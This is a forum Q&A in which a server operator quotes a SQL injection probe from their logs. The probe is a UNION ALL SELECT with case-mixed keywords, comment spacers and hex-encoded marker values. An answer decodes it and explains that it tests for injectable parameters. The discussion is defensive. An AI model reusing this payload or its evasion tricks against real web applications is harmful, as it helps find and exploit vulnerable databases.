I have been seeing this sql injection/attack on one of my servers and would like to know what it is trying to do. I know it's an attack and after googling it I see it is being used a lot but I do not see an explanation of what its doing and what the hex or binary is. Here is the attack
press-detail.php?id=999999.9+%2f**%2fuNiOn%2f**%2faLl+%2f**%2fsElEcT+0x393133353134353632312e39,0x393133353134353632322e39,0x393133353134353632332e39,0x393133353134353632342e39,0x393133353134353632352e39,0x393133353134353632362e39,0x393133353134353632372e39,0x393133353134353632382e39,0x393133353134353632392e39,0x39313335313435363231302e39,0x39313335313435363231312e39,0x39313335313435363231322e39,0x39313335313435363231332e39,0x39313335313435363231342e39,0x39313335313435363231352e39,0x39313335313435363231362e39,0x39313335313435363231372e39,0x39313335313435363231382e39,0x39313335313435363231392e39,0x39313335313435363232302e39,0x39313335313435363232312e39,0x39313335313435363232322e39,0x39313335313435363232332e39,0x39313335313435363232342e39,0x39313335313435363232352e39,0x39313335313435363232362e39,0x39313335313435363232372e39,0x39313335313435363232382e39,0x39313335313435363232392e39,0x39313335313435363233302e39,0x39313335313435363233312e39,0x39313335313435363233322e39,0x39313335313435363233332e39,0x39313335313435363233342e39,0x39313335313435363233352e39,0x39313335313435363233362e39,0x39313335313435363233372e39,0x39313335313435363233382e39,0x39313335313435363233392e39,0x39313335313435363234302e39,0x39313335313435363234312e39,0x39313335313435363234322e39,0x39313335313435363234332e39,0x39313335313435363234342e39,0x39313335313435363234352e39,0x39313335313435363234362e39,0x39313335313435363234372e39,0x39313335313435363234382e39,0x39313335313435363234392e39,0x39313335313435363235302e39,0x39313335313435363235312e39,0x39313335313435363235322e39,0x39313335313435363235332e39,0x39313335313435363235342e39,0x39313335313435363235352e39,0x39313335313435363235362e39,0x39313335313435363235372e39,0x39313335313435363235382e39,0x39313335313435363235392e39,0x39313335313435363236302e39,0x39313335313435363236312e39,0x39313335313435363236322e39,0x39313335313435363236332e39,0x39313335313435363236342e39,0x39313335313435363236352e39,0x39313335313435363236362e39,0x39313335313435363236372e39,0x39313335313435363236382e39,0x39313335313435363236392e39,0x39313335313435363237302e39,0x39313335313435363237312e39,0x39313335313435363237322e39,0x39313335313435363237332e39+and+'1'='1
What I would like to know why "999999.9", what is "0x39313335313435363237322e39". When this attack works what information would the hackers have or edits would they have done to the database. Last could this attack run over and over again bring down/crash the server?
Any explanation of this code would be greatly appreciated.
So, as it's being used a lot, I would submit my answer.
In my opinion, the aim of these requests is to check the presence or absence of a sql injection. This is the part of the query that is trying to inject:
999999.9 UNION ALL SELECT "91351456272.9","91351456272.9",...,"91351456272.9" and '1'='1
The goal of the attacker is to complete the query in this way:
SELECT * FROM table WHERE field=999999.9 UNION ALL SELECT "91351456272.9","91351456272.9",...,"91351456272.9"
If field
is not sanitized, and only if the number of the columns used in the UNION SELECT
match with the columns of the query, most likely will appear the string 91351456272.9
somewhere in the page.
That will be the confirmed for the attacker of a vulnerability in the page.
If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With